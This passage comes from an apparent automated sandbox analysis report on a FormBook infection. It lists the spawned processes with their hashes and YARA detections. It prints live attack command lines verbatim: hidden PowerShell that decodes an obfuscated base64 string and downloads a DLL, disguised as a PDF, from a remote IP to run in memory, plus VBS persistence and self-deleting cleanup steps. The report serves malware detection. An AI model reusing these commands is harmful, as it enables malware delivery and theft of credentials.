                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:7
                        Start time:21:15:31
                        Start date:27/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
                        Imagebase:0x7ff619710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        General

                        Target ID:8
                        Start time:21:15:32
                        Start date:27/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff77f440000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:9
                        Start time:21:15:39
                        Start date:27/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Imagebase:0x930000
                        File size:64616 bytes
                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:10
                        Start time:21:15:43
                        Start date:27/05/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff74fc70000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:11
                        Start time:21:15:45
                        Start date:27/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
                        Imagebase:0x7ff619710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        General

                        Target ID:12
                        Start time:21:15:46
                        Start date:27/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff77f440000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:14
                        Start time:21:15:49
                        Start date:27/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
                        Imagebase:0x7ff619710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Target ID:17
                        Start time:21:16:09
                        Start date:27/05/2022
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
                        Imagebase:0x7ff7d64c0000
                        File size:163840 bytes
                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:18
                        Start time:21:16:11
                        Start date:27/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
                        Imagebase:0x7ff619710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Target ID:19
                        Start time:21:16:12
                        Start date:27/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff77f440000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:21
                        Start time:21:16:18
                        Start date:27/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
                        Imagebase:0x7ff619710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000015.00000002.608771918.000002823988E000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000015.00000002.609935000.00000282490C6000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000015.00000002.605217866.0000028239656000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                        General

                        Target ID:23
                        Start time:21:16:25
                        Start date:27/05/2022
                        Path:C:\Windows\SysWOW64\cmmon32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\cmmon32.exe
                        Imagebase:0x3e0000
                        File size:36864 bytes
                        MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                        General

                        Target ID:24
                        Start time:21:16:35
                        Start date:27/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Imagebase:0xf20000
                        File size:64616 bytes
                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                        General

                        Target ID:25
                        Start time:21:16:36
                        Start date:27/05/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Imagebase:0x1100000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:26
                        Start time:21:16:37
                        Start date:27/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff77f440000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:30
                        Start time:21:17:07
                        Start date:27/05/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:explorer.exe
                        Imagebase:0x7ff74fc70000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:37
                        Start time:21:18:12
                        Start date:27/05/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                        Imagebase:0x7ff74fc70000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Disassembly

                        No disassembly